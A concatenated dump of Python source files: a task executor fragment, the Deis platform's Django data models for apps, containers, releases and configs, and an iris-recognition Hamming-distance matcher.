fout.write("exit $RETVAL\n")
# done writing to launch script, get it ready for execution.
st = os.stat(fname)
os.chmod(fname, st.st_mode | stat.S_IEXEC)
fout = open('%s/%s.out' % (sandbox, funcs['uid']), "w")
ferr = open('%s/%s.err' % (sandbox, funcs['uid']), "w")
self._prof.prof('exec_start', uid=funcs['uid'])
funcs['proc'] = subprocess.Popen(args = cmdline,
executable = None,
stdin = None,
stdout = fout,
stderr = ferr,
preexec_fn = os.setsid,
close_fds = True,
shell = True,
cwd = sandbox)
self._prof.prof('exec_ok', uid=funcs['uid'])
# --------------------------------------------------------------------------
#
def work(self, units):
if not isinstance(units, list):
units = [units]
self.advance(units, rps.AGENT_EXECUTING, publish=True, push=False)
for unit in units:
assert(unit['description']['cpu_process_type'] == 'FUNC')
self._funcs_req.put(unit)
# --------------------------------------------------------------------------
#
def _collect(self):
while not self._terminate.is_set():
# pull units from "funcs_out_queue"
units = self._funcs_res.get_nowait(1000)
if units:
for unit in units:
unit['target_state'] = unit['state']
unit['pilot'] = self._pid
# self._log.debug('got %s [%s] [%s] [%s]',
# unit['uid'], unit['state'],
# unit['stdout'], unit['stderr'])
self.advance(units, rps.AGENT_STAGING_OUTPUT_PENDING,
publish=True, push=True)
else:
time.sleep(0.1)
# ------------------------------------------------------------------------------
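# ------------------------------------------------------------------------------
# Hedged aside (not part of the original component): _collect() above follows a
# common collector pattern, where a daemon thread drains a result queue until a
# threading.Event is set, sleeping briefly when nothing is available.  A
# minimal, standard-library-only sketch of the same pattern (all names are
# illustrative):
#
#     import queue, threading, time
#     results, stop = queue.Queue(), threading.Event()
#     def collect():
#         while not stop.is_set():
#             try:
#                 item = results.get(timeout=0.1)
#             except queue.Empty:
#                 continue
#             print("collected", item)
#     collector = threading.Thread(target=collect, daemon=True)
#     collector.start()
#     results.put("unit.0001")
#     time.sleep(0.2)
#     stop.set(); collector.join()
# ------------------------------------------------------------------------------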
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
import etcd
import importlib
import logging
import os
import re
import subprocess
import time
import threading
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from django_fsm import FSMField, transition
from django_fsm.signals import post_transition
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def log_event(app, msg, level=logging.INFO):
msg = "{}: {}".format(app.id, msg)
logger.log(level, msg) # django logger
app.log(msg) # local filesystem
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
for k, v in value.iteritems():
if int(v) < 0:
raise ValueError("Must be greater than or equal to zero")
except ValueError as err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in ['deis']:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=utils.generate_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
def __str__(self):
return self.id
def _get_scheduler(self, *args, **kwargs):
module_name = 'scheduler.' + settings.SCHEDULER_MODULE
mod = importlib.import_module(module_name)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
_scheduler = property(_get_scheduler)
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def log(self, message):
"""Logs a message to the application's log file.
This is a workaround for how Django interacts with Python's logging module. Each app
needs its own FileHandler instance so it can write to its own log file. That won't work in
Django's case because logging is set up before you run the server and it disables all
existing logging configurations.
"""
with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f:
msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT),
message)
f.write(msg.encode('utf-8'))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
for c in self.container_set.exclude(type='run'):
c.destroy()
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if os.path.exists(path):
os.remove(path)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure.keys():
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.values('type').annotate(Count('pk')).order_by()
self.structure = {v['type']: v['pk__count'] for v in vals}
self.save()
return changed
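# Hedged aside (not part of the original model): a worked example of the diff
# arithmetic in scale() above, using illustrative numbers only.
#
#     existing, requested = 2, 5
#     diff = requested - existing   # 3  -> three new 'web' containers, numbered
#                                   #       from the current max num + 1 upward
#     existing, requested = 2, 0
#     diff = requested - existing   # -2 -> the two most recently created 'web'
#                                   #       containers are queued for destruction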
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
create_threads = []
start_threads = []
for c in to_add:
create_threads.append(threading.Thread(target=c.create))
start_threads.append(threading.Thread(target=c.start))
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if set([c.state for c in to_add]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set([Container.UP]):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
destroy_threads = []
for c in to_destroy:
destroy_threads.append(threading.Thread(target=c.destroy))
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == Container.DESTROYED]
if set([c.state for c in to_destroy]) != set([Container.DESTROYED]):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release, initial=False):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
# create new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.create))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that failed to create
if len(new) > 0 and set([c.state for c in new]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(new)
raise RuntimeError(err)
# start new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.start))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that didn't come up correctly
if len(new) > 0 and set([c.state for c in new]) != set([Container.UP]):
# report the deploy error
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if initial:
self._default_scale(user, release)
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self):
"""Return aggregated log data for this application."""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if not os.path.exists(path):
raise EnvironmentError('Could not locate logs')
data = subprocess.check_output(['tail', '-n', str(settings.LOG_LINES), path])
return data
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
INITIALIZED = 'initialized'
CREATED = 'created'
UP = 'up'
DOWN = 'down'
DESTROYED = 'destroyed'
CRASHED = 'crashed'
ERROR = 'error'
STATE_CHOICES = (
(INITIALIZED, 'initialized'),
(CREATED, 'created'),
(UP, 'up'),
(DOWN, 'down'),
(DESTROYED, 'destroyed'),
(CRASHED, 'crashed'),
(ERROR, 'error'),
)
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
state = FSMField(default=INITIALIZED, choices=STATE_CHOICES,
protected=True, propagate=False)
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
def _get_job_id(self):
app = self.app.id
release = self.release
version = "v{}".format(release.version)
num = self.num
job_id = "{app}_{version}.{self.type}.{num}".format(**locals())
return job_id
_job_id = property(_get_job_id)
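    # Illustrative example (not from the source): an app 'myapp' at release v3 with a
    # 'web' container numbered 2 yields the job id 'myapp_v3.web.2'.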
def _get_scheduler(self):
return self.app._scheduler
_scheduler = property(_get_scheduler)
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@transition(field=state, source=INITIALIZED, target=CREATED, on_error=ERROR)
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
job_id = self._job_id
try:
self._scheduler.create(
name=job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source=[CREATED, UP, DOWN], target=UP, on_error=CRASHED)
def start(self):
job_id = self._job_id
try:
self._scheduler.start(job_id)
except Exception as e:
err = '{} (start): {}'.format(job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@transition(field=state, source=UP, target=DOWN, on_error=ERROR)
def stop(self):
job_id = self._job_id
try:
self._scheduler.stop(job_id)
except Exception as e:
err = '{} (stop): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source='*', target=DESTROYED, on_error=ERROR)
def destroy(self):
job_id = self._job_id
try:
self._scheduler.destroy(job_id)
except Exception as e:
err = '{} (destroy): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
job_id = self._job_id
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
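    # Illustrative example (not from the source): for a procfile-based build (sha set,
    # no Dockerfile) the scheduler is invoked as run(job_id, image, '/runner/init', "'ls -la'"),
    # while an image/Dockerfile build uses run(job_id, image, '/bin/bash', "-c 'ls -la'").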
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
initial = True if self.app.structure == {} else False
try:
self.app.deploy(user, new_release, initial=initial)
return new_release
except RuntimeError:
new_release.delete()
raise
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.items() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
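    # Illustrative example (not from the source): if the latest config has
    # values == {'FOO': '1', 'BAR': '2'} and a new Config is saved with
    # values == {'BAR': None, 'BAZ': '3'}, the merged result is {'FOO': '1', 'BAZ': '3'}:
    # existing keys carry over, a None value deletes a key, and new keys are added.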
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
        # create the new release, auto-incrementing the version
        new_version = self.version + 1
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
logger.info(e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = '{}:{}'.format(self.build.image, source_tag)
# IOW, this image did not come from the builder
# FIXME: remove check for mock registry module
if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE:
# we assume that the image is not present on our registry,
# so shell out a task to pull in the repository
data = {
'src': self.build.image
}
requests.post(
'{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL,
self.app.id),
data=data,
)
# update the source image to the repository we just imported
source_image = self.app.id
# if the image imported had a tag specified, use that tag as the source
if ':' in self.build.image:
if '/' not in self.build.image[self.build.image.rfind(':') + 1:]:
source_image += self.build.image[self.build.image.rfind(':'):]
publish_release(source_image,
self.config.values,
self.image)
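    # Illustrative example (not from the source): promoting build.image ==
    # 'registry.example.com/owner/app:v2' with no sha imports the repository under the
    # app id and carries the ':v2' tag over, so publish_release() receives
    # '<app id>:v2' as its source image.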
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
            raise EnvironmentError('version cannot be below 1')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'id'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
log_event(build.app, "build {} created".format(build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
log_event(release.app, "release {} created".format(release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
log_event(config.app, "config {} updated".format(config))
def _log_domain_added(**kwargs):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_create_app(**kwargs):
appname = kwargs['instance']
if kwargs['created']:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
def _etcd_publish_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
def _etcd_purge_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
else:
_etcd_client.delete('/deis/domains/{}'.format(app))
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# save FSM transitions as they happen
def _save_transition(**kwargs):
kwargs['instance'].save()
# close database connections after transition
# to avoid leaking connections inside threads
from django.db import connection
connection.close()
post_transition.connect(_save_transition)
# wire up etcd publishing if we can connect
try:
_etcd_client = etcd.Client(host=settings.ETCD_HOST, port=int(settings.ETCD_PORT))
_etcd_client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
_etcd_client = None
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
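# Illustrative etcd keyspace written by the handlers above (values are examples):
#   /deis/builder/users/<username>/<key fingerprint>  -> SSH public key material
#   /deis/services/<app id>/                          -> empty directory created per app
#   /deis/domains/<app id>                            -> space-separated custom domains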
|
iris_matching.py
|
import os
from kn_iris.feature_vec import *
import pickle, numpy as np, re
import threading
try:
import queue
que=queue.Queue()
except ImportError:
from multiprocessing import Queue
que=Queue()
from scipy.spatial import distance
try:
    # Python 2 compatibility: use the lazy imap if it exists
    from itertools import imap as map
except ImportError:
    pass
import operator
def iris_recg(test_db_model_path, image):
    # load the enrolled iris encodings and their labels from the pickled database
    with open(test_db_model_path, "rb") as f:
        data = pickle.loads(f.read())
    iris_encodings = data["encodings"]
    names = data["names"]
    q = que
    # run the matching in a worker thread and wait for it to finish before reading the result
    matcher = threading.Thread(target=match_thread, args=(iris_encodings, names, image, q))
    matcher.start()
    matcher.join()
    if not q.empty():
        return q.get()
def match_thread(iris_encodings,names,iris_image,q):
iris_encodings_in_image = engroup(iris_image)
if iris_encodings_in_image !="invalid image":
match = find_match(iris_encodings, names, iris_encodings_in_image)
q.put(match)
else:
q.put("unmatch")
def hamming_check_string(str1, str2):
    # count the positions at which the two bit strings differ
    bits1 = np.array(list(map(int, str1)))
    bits2 = np.array(list(map(int, str2)))
    return int(np.sum(bits1 != bits2))
def compare_iris_encodings(known_iris, iris_encodings_in_image, name):
    total_distance = 0
    for iriss in known_iris:
        hgroup1, vgroup1 = iriss
        hgroup2, vgroup2 = iris_encodings_in_image
        # horizontal-group distance first, then add the vertical-group distance on top of it
        hamming_distance_value = distance_loop1(hgroup1, hgroup2)
        hamming_distance_value = distance_loop2(vgroup1, vgroup2, hamming_distance_value)
        total_distance += hamming_distance_value
    print("hamming distance", name, total_distance)
    return total_distance
def valuation(hgroup1, hgroup2, vgroup1, vgroup2):
    # average normalized hamming distance per group, computed with scipy
    distnc1 = distance.cdist(hgroup1, hgroup2, 'hamming')
    distnc2 = distance.cdist(vgroup1, vgroup2, 'hamming')
    value1 = np.average(distnc1)
    value2 = np.average(distnc2)
    return value1, value2
def distance_loop(str1, str2):
    assert len(str1) == len(str2)
    ne = operator.ne
    return sum(map(ne, str1, str2))
def distance_loop1(hgroup1, hgroup2):
hamming_distance_value = 0
for row in range(13):
# hgroup1[row] is a list of 32 members
for col in range(32):
hamming_distance_value += hamming_check_string(hgroup1[row][col],hgroup2[row][col])
return hamming_distance_value
def distance_loop2(vgroup1, vgroup2, hamming_distance_value):
for row in range(36):
for col in range(9):
hamming_distance_value += hamming_check_string(vgroup1[row][col],vgroup2[row][col])
return hamming_distance_value
def find_match(known_iris, names, iris_encodings_in_image):
    matchlist = []
    for index, iriss in enumerate(known_iris):
        matches = compare_iris_encodings(iriss, iris_encodings_in_image, names[index])
        if matches != 0:
            matchlist.append(matches)
        else:
            matchlist.append(2000)
    best_index = matchlist.index(min(matchlist))
    if matchlist[best_index] < 4500:
        return str(names[best_index])
    else:
        return "unmatch"
|
subprocess_env.py
|
from multiprocessing import Pipe, Process
